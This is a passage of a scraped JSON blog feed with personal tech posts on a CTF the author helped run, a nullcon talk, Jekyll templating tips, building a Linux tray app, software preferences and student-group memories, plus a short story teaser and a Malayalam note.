quiz (both prelims and finals):\nGeek Quiz Prelims\n\n\nGeek Quiz Finals\n\n\nSome audio\u002Fvideo files for the finals are up here.\nBackdoorCTF 2014\nLast year, I was the coordinator for Backdoor CTF 2013, a jeopardy-style CTF\ncontest hosted by SDSLabs under the aegis of Cognizance. This year,\nI contributed 3 problems to the CTF. The problems were as follows:\nweb200 - Timing Attack (Source)\nweb250 - YAML Code Execution (Source)\nweb100 - _ Template Code Execution (Source)\nYou can find writeups\u002Fsolutions to the problems all over the internet and on ctftime.\nHosting a CTF is always a humbling experience and it was great to see teams from\nall over the world participating in backdoor. We hope to return next year with\neven better challenges.\nCogni Geek Quiz\nAfter that I teamed up with Giri again (along with Sukun) for the Cogni Geek Quiz,\nhosted by the winner of my quiz, Vikram Rathore. While we won the quiz\nby a large margin (30 points), I managed to get my own tribute question wrong unfortunately.\nHowever, it was a great experience involving some really nice questions. Update: The slides\nare up at mega.\nColors & Typefaces\n#cbe86b\n#1c140d\nTypefaceOswald\nTypefaceLato\n\n\n\n\n    \n#2e2633\n#99173c\nTypefaceOswald\nTypefaceLato",[],{"slug":2913,"title":2914,"link":2915,"pubDate":2916,"contentSnippet":2917,"tags":2918,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"nullcon-experience","My experience at nullcon 2014","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F03\u002F13\u002Fnullcon-experience\u002F","2014-03-13T00:00:00.000Z","I was recently a speaker at nullcon 2014, a premier infosec conference\nin India. My talk was a re-hash of my earlier talk at Deloitte CCTC-2\nand was titled “Browser Extension Security”.\nI applied for the CFP sometime in November with a copy of my talk, paper and\ncode I’d used. My application was reviewed and I was told, accepted under the\nnight-track on 13th February.\nThe talk itself covered browser security mechanisms, and where the\ncurrent state of art lies (Chrome) with respect to Browser Extensions. The talk\nwas pretty well received (even though I sweated a lot onstage), and a lot\nof attendees came up to me to discuss it further after the talk.\nThe paper behind the talk, and the related source code can be found on GitHub.\nCreate a new issue or send me an email in case you have any queries. ~The tool demo\nI gave during the talk can be found at http:\u002F\u002Fnullcon.captnemo.in~ (Not available anymore). Note, however\nthat it currently uses cached data to check for permissions, and is not a LIVE tool.\nnullcon was my first conference, and I’m glad to say I enjoyed it very much. From\nthe great hosts to the amazing parties, and all the free booze, I loved it all.\nI made a lot of friends, and I plan on keeping in touch. The networking level\nwas amazing at the conference, and I was happy to get in touch with so many guys\nin the industry, so to speak.\nA lot of people queried me about future research on the topic, and while I currently\ndo not have enough time to pursue it, its on my radar of things to do. I’m also\nthinking of getting in touch with the Chrome Security Team with my research.\nAs an aside, a big thanks to Rushil for helping me in the first version\nof the paper for CCTC. It won’t have been possible without him.\n##Some Clicks\n\n\nI’m still waiting on receiving official clicks from nullcon. Will update this\npost when I get my hands on them.",[],{"slug":2920,"title":2921,"link":2922,"pubDate":2923,"contentSnippet":2924,"tags":2925,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"pluginless-jekyll","Using Jekyll optimally without plugins","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F01\u002F20\u002Fpluginless-jekyll\u002F","2014-01-20T00:00:00.000Z","If you’re a programmer, by now you’ve surely heard of the various static-site\ncompilers that are taking over the world. My pick of choice is Jekyll, (about\nwhich I’ve blogged earlier as well) mostly because\nit is the default supported tool for the GitHub Pages service. Read my earlier\nblog post if you don’t know about Static Site Generators.\nUsing Jekyll means that it is far more easier for me to host my blog on GitHub\nPages by just writing down posts in plain markdown. Markdown, for those of you\ndon’t know is a simple markup language that uses an email-like syntax that is\nthen compiled to HTML.\nA lot of power in Jekyll comes from its various plugins, but I’ve always been\nvary of using them as the default host for Jekyll (GitHub Pages) disables\nall plugins and runs in safe mode. Plugins are an awesome tool to have, but they\nare only good if you are hosting the site on your own machines. I’m not shying\naway from using them but want to point out that plain-Jekyll itself is powerful\nenough to do most of the tasks. What follows are some examples of how to use\nJekyll optimally.\nData Files\nThis is a recent addition in Jekyll that allows you to use\ndata noted down in YAML format inside the _data directory that is accessible\nto you anywhere using the site.data prefix. For instance, I recently shifted\nthe SDSLabs Team Page from plain HTML to Jekyll, and I used a data file\nto define all the required elements that are shown for every user. The data file\nlooks something like this (_data\u002Fmembers.yml):\n- name: \"Abhay Rana\"\n  pic: \"abhay.jpg\"\n  links:\n    Facebook: \"https:\u002F\u002Ffacebook.com\u002Fcapt.n3m0\"\n    Twitter: \"https:\u002F\u002Ftwitter.com\u002Fcaptn3m0\"\n- name: \"Team SDSLabs\"\n  pic: \"sdslabs.jpg\"\n  links:\n    Facebook: \"https:\u002F\u002Ffacebook.com\u002FSDSLabs\"\n    Twitter: \"https:\u002F\u002Ftwitter.com\u002Fsdslabs\"\n\n\nThen, I iterate over this data using the following syntax:\n{% for member in site.data.members %}\n\u003Cimg src=\"pics\u002F{{member.pic}}\" alt=\"{{member.name}}\">\n\u003Cdiv class=\"img-bar\">\n  \u003Cspan class=\"img-title\">{{member.name}}\u003C\u002Fspan>\n  \u003Cspan class=\"img-icons\">\n    {% for link in member.links %}\n    \u003C!-- link[0] holds the hash key = facebook\u002Ftwitter -->\n    \u003Ca href=\"{{link[1]}}\">\u003Cimg src=\"assets\u002F{{link[0]|downcase}}.png\">\u003C\u002Fa>\n    \u003C!-- link[1] holds the hash value-->\n    {% endfor %}\n  \u003C\u002Fspan>\n\u003C\u002Fdiv>\n{% endfor %}\n\n\nEarlier, you could have achieved the same thing by adding this data to your\n_config.yml file, but the _data folder allows you to store data properly\nin various files, if needed.\nLiquid Filters\nSince Jekyll relies on Shopify’s Liquid language for templating\npurposes, it has a very large list of supported functions, filters and markup\ntools ready for you to use. For instance, while working on the\nSDSLabs Portfolio, I used the split and downcase filter to convert\na known list of categories to single word objects that could be used as file\nnames.\n{% for category in site.data.category %}\n  \u003C!-- category is something like \"Web Development\"-->\n  {% assign category_name = category|split: ' '|first|downcase %}\n  \u003Ca href=\"\u002Fcategory\u002F{{category_name}}.html\">{{ category }}\u003C\u002Fa>\n{% endfor %}\n\n\nThe above snippet converts a string like “Web Development” to a smaller string\n“web” that can be used by us for filenames much more easily.\nYou can check out more liquid filters over here. These include\nthings like plus, times, reverse, and even md5 (helpful for gravatars).\nCode Highlighting\nMarkdown is really awesome, but it lacks Synax Highlighting for code. Jekyll\nuses pygments to support syntax highlighting for various languages.\nTo highlight a piece of code, you just use the following syntax:\n{% highlight ruby %}\ndef show\n  @widget = Widget(params[:id])\n  respond_to do |format|\n    format.html # show.html.erb\n    format.json { render json: @widget }\n  end\nend\n{% endhighlight %}\n\n\nAnd the output will look like this:\ndef show\n  @widget = Widget(params[:id])\n  respond_to do |format|\n    format.html # show.html.erb\n    format.json { render json: @widget }\n  end\nend\n\n\nCustom Permalinks\nEveryone knows about handling the blog posts permalink using the permalinks\nsetting in _config.yml. But did you know that you can provide custom\npermalink to any page in your site? For instance, the Jekyll documentation site\nuses the following:\n\npermalink: \u002Fdocs\u002Fconfig\u002F\n\n\nin the frontmatter for the file docs\u002Fconfiguration.md. The file would have\nbeen published to docs\u002Fconfiguration.html by default, but the permalink in the\nfile forces it to be published to \u002Fdocs\u002Fconfig\u002Findex.html. Its a really nice\nsetting that allows you to customize the post url for any particular post.\nRaw Liquid Tag\nIn the rare case that you want to use liquid-like syntax somewhere, say you are\nusing Handlebars (which uses {{{variable}}} to echo variables).\nYou can use the following syntax:\n\n{% raw %}\nHere is some {{mustache}}\n{% endraw %}\n\n\nIn fact, I’ve used the raw tags a lot in this blog post to escape all the liquid\nportions. You can see the liquid documentation for more help.\nSide Note: Writing the endraw tag in liquid is really, really hard.\nEmbedding HTML\u002FCSS inside markdown\nSometimes, there are some things that just can’t be done with markdown. For\ninstance, if you need to use a custom tag, or need to write some css within the\nmarkdown document for some reason, there is always a way: just embed content\ninside \u003Cdiv> tags. This is not a Jekyll feature, but an implementation detail\nof Markdown itself, but I think its hacky enough to get a mention here.\n\nWriting **markdown** here\n\u003Cdiv>\n  \u003Cstyle>\n    body{\n      margin-top: 10px;\n  }\n  \u003C\u002Fstyle>\n\u003C\u002Fdiv>\nBack to _Markdown_.\n\n\nAnything inside a \u003Cdiv> tag is untouched by Markdown, and is rendered as it is.",[],{"slug":2927,"title":2928,"link":2929,"pubDate":2930,"contentSnippet":2931,"tags":2932,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"on-github","On GitHub","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2013\u002F12\u002F25\u002Fon-github\u002F","2013-12-25T00:00:00.000Z","I am an Internet addict. And the website I’m most addicted to is called GitHub. GitHub is a social code hosting website that is totally awesome. Not your general run-of-the-mill awesome, but rather ass-kicking best-thing-in-the-world awesome. If GitHub was a ninja, it would be Po, defeating the evil clutches of SourceForge.\nWhen Linux was released a couple of decades ago, it was hosted on a university FTP server. Today, the days of FTP are way past, and unless your code is hosted on a code-sharing website like GitHub, it is as good as dead. The last decade has seen an explosive grown in software and the open source movement. Things like GitHub, Linux, Android, Facebook have been made possible due to the combine efforts of millions across the globe following the Unix philosophy of doing one thing well.\nAhh, I digress. The point I’m trying to make is that it is very hard to explain to a layman how important GitHub  has been to the software community. It has been used as a collaboration platform for writers, law makers, governments, programmers, and even musicians. People have used its issue tracking feature to even plan weddings. And above all, people adore GitHub. It is one of the few startups that have been accorded God status in the community.\nThe question here is what makes GitHub tick? As the largest hosting site for code, it obviously makes a huge impact just by virtue of being there. But its tide of features and innovative progression had made it a darling of all. For instance, their 1 click to fork feature has allowed people to contribute to any project so much easier.\nGitHub has an amazing User Experience, making sure it works  perfectly on all devices large or small. Their amazing support makes sure all of its users are happy as possible. Their regular meetups makes sure that GitHub is invested in the software community themselves. And their GitHub Store lets people invest back in GitHub by romoting them via Tees, stickers and  even laptop sleeves.\nMy personal experience with GitHub has been overwhelmingly positive. People have stood beside GitHub even as they faced major issues, and for me that is indicative of a trust in GitHub that no money can buy. The GitHub API (which I’ve used more than once) lets developers create their own apps on top of GitHub which others can use to create even more awesome things.\nFor me GitHub is more than just a coding website. It is a testament to creativity and the Hacker Way, reminding me every day that anything is possible.",[],{"slug":2934,"title":2935,"link":2936,"pubDate":2937,"contentSnippet":2938,"tags":2939,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"making-hackertray","Making HackerTray","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2013\u002F11\u002F28\u002Fmaking-hackertray\u002F","2013-11-28T00:00:00.000Z","A few days back, I found the excellent HackerBarApp via Hacker News. Hacker News,\nfor those of you who don’t know, is  tech news website run by YCombinator.\nHacker Bar was the simplest way of accessing HN stories that I’d ever seen. Unfortunately,\nit was only for Mac (made using rubymotion) and even though the source was available,\nit was of no use to me as a Linux User.\nI decided to make a clone of Hacker Bar that would work on Linux. My first choice of the\nstack was node-webkit, an application framework that allows you to build cross-platform\napplications using HTML, CSS, JS, and modules from the node.js ecosystem. After reading a lot\nabout node-webkit, I figured out that building this application in node-webkit (as it stands)\nwould not be possible. Or rather, it would not work under Ubuntu and its derivatives because\nof lacking appindicator support in node-webkit. More details here.\nThe next obvious language and stack of choice was Python + Gtk. I’d already played a little bit\nwith Gtk and Python some time back, so I knew the basics. But I’d never build a real application\nwith PyGtk, just toys and small scripts. I found a basic skeleton app\nthat was written for AppIndicator and modified it somewhat to form the base of HackerTray.\nThe next challenge I faced was keeping the check boxes always checked despite of any number\nof clicks after the first. That is, we don’t want any menu item to be “un-checked” at\nany moment. A basic idea is to do this (partial code):\ndef open(self, widget):\n\tif(widget.get_active() == False):\n\t\twidget.set_active()\n\twebbrowser.open(widget.url)\n\ndef addItem(self, item):\n\t#create a new CheckMenuItem (i)\n\ti.connect('activate', self.open)\n\n\nHowever, this does not work as expected, because the widget.set_active() call also results\nin the activate event being fired, which ultimately calls open. This means on a click to\nan unchecked menuItem, the open function is called twice. This results in the browser opening\nthe link twice.\nAs a workaround, I disabled the event handler in case it is a checked menuItem:\ndef open(self, widget):\n\tif(widget.set_active() == False)\n\t\twiget.disconnect(widget.signal_id)\n\t\twidget.set_active(true)\n\t\twidget.signal_id = widget.connect('activate', self.open)\n\twebbrowser.open(widget.url)\n\ndef addItem(self, item):\n\t#create a new CheckMenuItem (i)\n\ti.connect('activate', self.open)\n\ti.signal_id = i.connect('activate', self.open)\n\n\nThe next thing I worked on was a persistent memory for the app. In a nutshell, I needed to\nmake sure that the tick on an item remained there, even if the app was restarted. This meant\nwriting a list of all the “viewed” items into a file. After looking at shelve for a\nbit, I just rolled my own implementation\n, based on storing the data into ~\u002F.hackertray.json file.\nAfter that I worked on packaging the app into a python package, so that it could be easily installed.\nThe python packaging tutorial was an easy to use guide\nthat let me create the package\neasily and push it to the Python Package Index. A few issues in the package\nwere found, and were fixed quickly thanks to the pull request by @brunal.\nAfter improving the README a bit, I posted about it on Hacker News, where it failed to get any traction. I re-tried with a link\nto the HackerTray website, and that fell flat as well. It was on the next day, when I posted it to HN\nfor the third time, that it took off. After 50 or so upvotes, I found that my instance refused to run because it had\nhit the API Rate Limit on the excellent node-hnapi. I quickly pushed a fix\nthat used a list of servers to hit as fallback in case it crossed the Rate Limits.\nAfter a lot of feedback from HN, I started work on a node-webkit based clone of hackertray for Windows. I should be able to release\nit in a few more days, if nothing else crops up. Keep watching this space for info. If you have any queries, just file an issue on GitHub\nor contact me.",[],{"slug":2941,"title":2942,"link":2943,"pubDate":2944,"contentSnippet":2945,"tags":2946,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"aboard-the-nautilus","Aboard the Nautilus","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2013\u002F09\u002F21\u002Faboard-the-nautilus\u002F","2013-09-21T00:00:00.000Z","I’d done a post on this a long time back (2009), detailing\nwhat all softwares I use on a daily basis. This\nis an update to that post.\nSince the last post, I’ve moved on to using Linux, using\nElementary OS as my primary OS. Over the time period this post was written,\nI’ve shifted from using Cinnamon to Openbox and finally\nto elementaryOS’s pantheon as my Desktop Manager. I’m thinking of switching\nto Arch Linux, just to get a faster experience. I use \nSynapse as my application launcher, because its much faster\nthan anything else out there.\nFor most of my web browsing needs, I rely on Google Chrome Stable\nand a daily build of Chromium (v31 as of now) for most of my work.\n I switch between them all the time. I use Firefox (stable) only to\ntest out my projects from time to time.\nThe current editor I use is Sublime Text. It is\neverything you need, and much more. I’m still to\nget started using its build system, and its\nplethora of packages; but its still an excellent\nchoice for a daily use editor. On the command line, I use\nVim, git (with SCM Breeze), fasd and tig, \nwhich is an excellent git interface on the command line.\nI listen to music on my own browser-based music\nplayer, called Muzi, YouTube and GrooveShark.\nFor my terminal needs, I use Gnome-Terminal. I use\nByobu to manage my session, and often\nconnect to it from other computers as well. Its an\nexcellent multiplexer that fits in my workflow\nreally well.\nI use Imo.im on both the\nDesktop and my tablet to chat. I occasionally use ReText\nfor editing markdown files. I use RedShift on my laptop and f.lux\non my iPad to help me sleep better. I recommend it to everyone who is\nsuffering from eye-strain or wants to sleep better.\nOn the browser, my most visited sites would be\nHacker News (via hckrnews.com), WorkFlowy for managing\nmy to-do list and GitHub on a daily basis for most of my projects.\nHardware\nI own a old Nokia X3-02, and will be upgrading to a Firefox OS Phone soon enough. I use a Dell Inspiron 1545 as my personal machine. I also use an iPad 2 (with 3G) on a daily basis (mostly for reading). I also own a Dayan Zhanchi 3x3 and a 5x5 shengshou \nspeed cube.\niPad Apps\nThe must have iPad apps for me are Chrome, imo,  and iBooks. I have installed Mailbox alongside GMail, and haven’t used GMail since\nI installed it. I sometimes write stuff using Plaintext, and sketch using Paper. I read my RSS feeds using Newsify and Feedly.\nExtensions\nChrome Extensions that I use on a daily basis include Chime for \nwonderful notifications (highly recommended), Ghostery for getting a tracker-free internet\n, HTTPS Everywhere to keep me secure, LastPass to manage passwords and Stylish\n for customizing the looks of various websites.\nDream Setup\nMy dream setup would consist of a lightweight Ubuntu Laptop that I can carry around\nthat still has lots of processing power and battery life. I’ll prety much be satisfied\nby any high-end Android phone as long as it has a decent battery life.",[],{"slug":2948,"title":2949,"link":2950,"pubDate":2951,"contentSnippet":2952,"tags":2953,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"why-i-still-recommend-windows","Why I still recommend Windows","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2013\u002F07\u002F21\u002Fwhy-i-still-recommend-windows\u002F","2013-07-21T00:00:00.000Z","Even though I am a long time Linux user, and a big time fan of the many Linux distros that I’ve tried out over time, I still go around recommending Windows to people who ask me for advice. The only exception I make is when the person in question is a developer, in which case I try to convert them to the Church of Linux.\nThe main reason I recommend windows to non-developers is because it is a far better operating system than most Linux distributions (for general public). Now, before you bring out your pitchforks, hear me out.\nThe first and foremost reason that I give is that Windows sports a far better integration across all its services. Nautilus\u002FNemo in the Linux world do not reach same level of integration that Windows Explorer does. For instance, just look at the way the “Send To” feature works in explorer. To add a folder to the send to entry, you just have to add a shortcut to that folder inside the special “Send To” folder. On nautilus, the equivalent would be going about installing an extension, and editing a configuration file by hand.\nOr take a look at how the “Play All” feature in Explorer. Or the “Libraries” feature in Windows 7. Or the simple way that you handle file sharing in Windows. Even though Linux has (arguably better) Samba support for files sharing, you have to go about editing a handful of files to make it work. I personally find apache easier to configure to just share files one way.\nGames are another reason. Even though Steam is available on Linux, all of the non-Valve triple-A titles are missing on Linux. Even though I continue to buy and play the Humble Bundles that offer Linux as a platform, I’m reminded of the stark reality every day when my friends ask me if I’ve played a recent title such as Call of Duty, Metro, NFS or even Swapper.\nThe next peeve that comes to my mind is the ridiculous driver support. It has been improving since a long time, but its still not there. Even Ubuntu needs to fetch proprietary drivers for my WiFi support on Broadcom, which needs an internet connection in the first place. This means I need to find out a LAN network connection to even start using Ubuntu. Similarly the pain I’d to go through to install drivers for Ralink network drivers on a friend’s laptop was immense. I can never use circular scrolling or touchpad zoom on my laptop in Linux because there are still no drivers available anywhere for it. And don’t get me started on UEFI boot issues. No matter what people believe or pretend, hardware support is just not good enough to be relied on in the Linux world. As a side note, I haven’t synced my iPad in Ubuntu since I shifted to iOS 5, and apple driver support on Linux will remain abysmal forever just because iTunes will never be released for Linux. The last version of iOS that had music sync support (via libimobiledevice) was iOS 4.0 (released 3 years ago in June 2010).\nNext I want to point put out the upgrade pain that everyone has to go through. It’s like a constant rite of passage, which turns a Linux noob into an actual user. I am yet to do an Ubuntu upgrade which went smoothly and didn’t break a thing; and I’ve been upgrading my Ubuntu since 10.04 was released. The upgrade tag on askubuntu is chock full of horror stories.\nAnother thing that frustrates me to no end is that the Ubuntu Dash, and the GNOME Overview are both slow as hell. I’m currently using Cinnamon, which is faster than both of these, but still an order of magnitude slower than the Windows Start Menu. Synpase is better, but cannot be set as the deafult.\nI was using Windows 7 on my cousin’s laptop these last few days and I remembered the favourite app that I used to no end: Everything. It is the quickest file search I’ve ever used. The alternatives, in the Linux world are synapse, zeitgeist, and plain old locate command. The only issue is that I’ve to manually run updatedb manually, while Everything was always up to date, using the NTFS File Journal. To this date, I am yet to find a good enough alternative to Everything.\nIt is true that Windows lacks many of the good things that Linux distros provide, such as the excellent package management support, POSIX compatibility, and the plethora of tools we get on the command line; but at the same time, it is also a better operating system for most of the masses. I’ll continue to recommend Windows to all my non-developer friends till “The year of Desktop Linux” arrives.",[],{"slug":2955,"title":2956,"link":2957,"pubDate":2958,"contentSnippet":2959,"tags":2960,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"sdslabs-personal-blog-post","SDSLabs - My experiences","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F12\u002F27\u002Fsdslabs-personal-blog-post\u002F","2012-12-27T00:00:00.000Z","Introduction\nFor the past two years, I have been involved in a student group in our campus called SDSLabs.\nIt has been the most fun two years of my life. I have acted as programmer, developer, manager,\nmonkey-coder, event-manager and all other roles one might expect in a startup. However, I have\nnever really blogged about any of this. Someone pointed it out recently to me, the truth is I\nhave been meaning to write this since a very long time, but its kind of hard to put down in\nwords. I’ll try my best. This post is highly specific to iit roorkee (you have been warned).\nChronology Of Events \u002F Timeline\nBack in my first year, after joining something called SDS as a proficiency in the campus, I was learning PHP.\n With no-one to guide me, I had only attended a single talk by Shobhit Singh where he talked about dynamic\n websites. I was instantaneously hooked. I did something called lion, a twitter clone and it won 3rd prize\n in Srishti. It had follow, unfollow, messages, tweets, and groups (one feature which set it apart from twitter).\nThe code was a mess of php and inline html, and I have never looked upon it since. I did a couple more projects by myself\n, learning the in and outs of php (I was still to hear about ruby\u002Fpython). At the end of my first year, I did a project\n management system under Kumar Shashank who taught me about MVC and the need of architecture in a software application.\nAt the very end of the project, a group called SDSLabs was formed. Along with a few people\nShobhit sir had found, we founded SDSLabs. Everyone in the group was passionate about building things.\nAnd somehow, magically, I was in it. And there began the most beautiful chapter of my life..\nCoding & Learning\nAfter completing the PMS (Project Management System), I moved on to work on Filepanda, and then the entire framework\napplication for SDSLabs. All our applications are powered by a single API, which I wrote. Meanwhile, Harshil was working\n on DC++, and other awesome things. I met pranav sir, and was introduced to the thousand-quirks-of-css. It shifted to mint, and\nthen to ubuntu. I learned the ins-and-out of managing a linux system. Back then SDSLabs was limited to the small committee\nroom in Hobbies Club (with Shobhit Sir working tirelessly on funding for a better lab).\nAnd I met Ishan Sir. If you are reading this, thank you for teaching me how to learn. I had tons of night-outs with him\ndiscussing things I barely remember now. I became a creator. I executed on tons of ideas. Most never saw the second day in\ntheir lives, but I still have them with me, as memento of the past and what was to be. Ishan Sir was a gold-mine for learning.\nEverything I could ever ask, and he’d hand over a resource. Some of my most productive learning days were spent with him.\nRecruitments\nAfter a single semester of work, we held our first recruitments. I wrote my\n first blog post for the lab at the time noting\ndown my amazing reaction to the awesome people that had joined the lab.\nIt is difficult to distil into words the awesome learning experience I had with all these people. Going to chapos, thinking\nabout how we could expand. What else awesome stuff we could do? One night hackathons, where we coded awesome stuff.\nAnd I started to work on Muzi, which was to be my application. It stands at 811 commits today, with over\n200 issues in our project management system.\n I went into the development knowing PHP and bits of AJAX, and came out a JQuery fanboy. Muzi has been my primary music player\n  for almost an year now. It feels awesome to listen to music on a music player you coded. The initial version was\n  based on Zune’s design on Windows. We kept on improving it till it was exactly what we wanted. Today, people have listened to\n  almost 1 lac songs on Muzi, and it feels awesome to have been behind something that is so widely used (within the campus).\nLaunch\nThe next semester involved our actual launch (11-11-11) of all our applications.\nWe had all converted into semi-breathing coding machines cum zombies by that time though. Sleepless and exhausted, we did prevail,\nand launched a few hours early. The Launch was appreciably recieved in the campus, although I had to leave for the\n Deloitte CCTC Contest the very same day(which we won!).\nI ended up doing a rewrite of Codematics (codename CodeBot) in node for the launch. It has a geeky, command line interface\nwhich was inspired by goosh and xkcd’s unix interface. Along with that, Muzi was\nlaunched to huge appreciation as well.\nRecruitments Again\nThis was the semester where our group actually expanded. Our count is almost 42 now, and nothing could\n make me more glad than actually being with all these people.\nI donned lots of hats teaching, guiding, coding, and managing people. Linux became one of my top skills, and I learnt a lot.\nWe shifted to Redmine for management, and I ended up doing a lot of server-administration related stuff (gitolite,redmine,vhosts\n,apache,varnish etc).\nIt has almost been a year since our last recruitment. We have been working of tons of things; some of which\nwill be launched soon. I took lectures on far apart topics from\n“Usability Designing” to\n [“Software Development 101”].(https:\u002F\u002Fspeakerdeck.com\u002Fcaptn3m0\u002Fsoftware-development-101) I mostly\nworked on internal features, improving our API, and something called Presence. We also\nparticipated in\ntwo hackathons,\nand we won both of them.\nWhere, now?\nOur group is still nascent, and although I have not mentioned every project that the group (or even I) have\n done for fear of making this post too long. That itself speaks volumes about what we’ve done in a short\n span of two years. Our tagline reads “iDream. iCode. iInnovate”. I wish for the group to continue on that\n  path. Develop things that make life easier; for everyone around the world.\nPeople\nThroughout this journey, there have been lots of people, without whom this blog post would never have been written.\n You all know who you are. Keep being awesome.\nSkills\nI used to call myself a programmer, but now I’m in a more management-esque role in SDSLabs. Its my share of the work to manage projects,\nand track progress. That does not mean that I’ve given up coding, and I still do code a lot for our internal projects. I have also become\nsomewhat of a UX enthusiast, taking care of most ux work done in lab. I have also found myself becoming an avid learner, and have Ishan\nSir to thank for that.\nAnecdotes & Stories\nThis post already reads more like a things-i-did-at-sdslabs, which is something I was hoping to avoid, instead of why-i-love-sdslabs, which is what i wanted. So I’m gonna stick a few moments and events that stand out to me…\nWe have a board with three defining people on it: Steve Jobs, Dennis Ritchie, and Linus Torvalds.\nWe have had mind-blowing pizza chapos. So many pizzas that they were brought in 2 rickshaws from dominos. Yup.\nI am known as the bot in lab. Mostly because of my highly rational unemotional responses, and other things. There is another person, who is trying to get that title, though.\nI am famously known for turning down “writing a letter that could have fetched us lots of funding” for coding instead. (In my defense, there were other people who could have handled it better than me, and we didn’t need it badly at the time)\nAlmost every group in the campus describes their group as a second home. But in our case it is partially true. We spend almost all our free time in lab. I spent close to 500 hours in the lab in this semester alone. Where does this all this time go? Talking, discussions, development, teaching, lectures among other things.\nSDSLabs feels more of a startup than an actual student group to me (and Shashank as well). We have to fight for our funding, manage people, and develop products.\nI have done way too much copy-editing to be called “just a developer” anymore. I have spent hundreds of hours fighting Pinta and its numerous bugs.\nIt has been a great experience working with all these people. I can just hope that the group keeps moving to better\ninnovation, and grander ideas in the future. We are recruiting from first year in upcoming January. If SDSLabs feels like a place you’d\nenjoy, just come over and take our test. It changed my life, maybe it will change yours too.",[],{"slug":2962,"title":2963,"link":2964,"pubDate":2965,"contentSnippet":2966,"tags":2967,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"why-i-m-moving-from-outlook","Why I'm leaving outlook.com","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F12\u002F22\u002Fwhy-i-m-moving-from-outlook\u002F","2012-12-22T00:00:00.000Z","I’d been one of the most eager users of the new outlook.com redesign. \nI’m a real fan of Metro (sorry, I must call it the New Windows 8 Design),\n and think that the correct typgraphy mixed with the correct design language should help the users in a great way forward.\nUnfortunately, outlook.com is not there yet. The application was made to resemble the Windows Mail app in Windows 8, with 3 tiles per screen. On Windows, the application works in 1\u002F2\u002F3 width modes differently. It changes its navigational strategy to allow you to browse your emails easily. While this could have been easily accomplished using responsive design techniques on the web, outlook does not use it and loses sorely needed funcionality.\nThe typography of the app is horribly broken, especially in Linux. The font of choice for the app is Calibri, which is missing in Linux, and as such, uses the default system font from the browser. The font sizes are inconsistent, and the application shortcuts are horrible, even though I am using GMail shorcuts option.\nThe “Insert Link” option is horribly designed. It does not respond to enter keys, and has no place to add “Text” for the link either.\nThere is no mechanism for quoting messages properly at all. There is no such thing like Conversation View, and I have to waste large amounts of time just to figure out what was added new in the reply to my own mail. As such this becomes largely cumbersome to keep up with.\nThe archive option from GMail (which keeps my inbox clean) is notably missing as well. (Update: This was added later, with the\nability to use archive to move to any custom folder)\nThe “Active View”, which seems to be a quick preview mode, only works on Windows, because it uses Silverlight. I tried using\nMoonlight (Silverlight’s OSS clone for Linux), but it seems that Active View uses new Silverlight features. Hence, I can \nonly download pics from Outlook, and not browse them online (which is a huge pain-point for me).\n\u002FRant",[],{"slug":2969,"title":2970,"link":2971,"pubDate":2972,"contentSnippet":2973,"tags":2974,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"parallels","Parallels","https:\u002F\u002Fnadh.in\u002Fblog\u002Fparallels\u002F","Tue, 18 Dec 2012 00:00:00 +0000","A sci-fi short story inspired by Isaac Asimov’s “The Last Question”.\nMunic hurried along the dimly lit corridors of the C-wing of the Neutrino lab. It was past midnight, and he had received an alert on his phone sent by one of the monitoring terminals. His palms and brows were trickling sweat despite the unusually cold night. His off-white Oxford shirt was unevenly buttoned and lazily tucked in, but he didn’t seem to notice, or for that matter, care.",[],{"slug":2976,"title":2977,"link":2978,"pubDate":2979,"contentSnippet":2980,"tags":2981,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"e0-b4-85-e0-b4-a3-e0-b5-8d-e0-b4-a3-e0-b4-be-e0-b4-b0-e0-b4-95-e0-b5-8d-e0-b4-95-e0-b4-a3-e0-b5-8d-e","അണ്ണാരക്കണ്ണന്‍മാര്‍","https:\u002F\u002Fnadh.in\u002Fblog\u002F%E0%B4%85%E0%B4%A3%E0%B5%8D%E0%B4%A3%E0%B4%BE%E0%B4%B0%E0%B4%95%E0%B5%8D%E0%B4%95%E0%B4%A3%E0%B5%8D%E0%B4%A3%E0%B4%A8%E0%B5%8D%E0%B4%AE%E0%B4%BE%E0%B4%B0%E0%B5%8D\u002F","Wed, 15 Aug 2012 00:00:00 +0000","കഴിഞ്ഞ മൂന്നു വര്‍ഷങ്ങളില്‍ എണ്ണം 80-ശതമാനത്തിലധികം\nകുറഞ്ഞ അണ്ണാരക്കണ്ണന്‍മാര്‍ ഇപ്പോള്‍ വംശനാശ ഭീഷണി\nനേരിടുകയാണ് (മാതൃഭൂമി, 15 ഓഗസ്റ്റ്). കേരളത്തിലെമ്പാടും\nഒരു കാലത്ത് പതിവ് കാഴ്ച്ചയായിരുന്ന അണ്ണാന്‍ ഇല്ലാതാകുന്നു\nഎന്ന് കേള്‍ക്കുമ്പോള്‍ ആദ്യം നടുക്കം, പിന്നെ സങ്കടം :(",[],{"slug":2983,"title":2984,"link":2985,"pubDate":2986,"contentSnippet":2987,"tags":2988,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"chrome-ios","Things I expect in a Chrome\u002FiOS update","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2012\u002F07\u002F14\u002Fchrome-ios\u002F","2012-07-14T00:00:00.000Z","I’ve changed to using Chrome for iOS as my primary browser. Since I only own an iPad 2, all of my 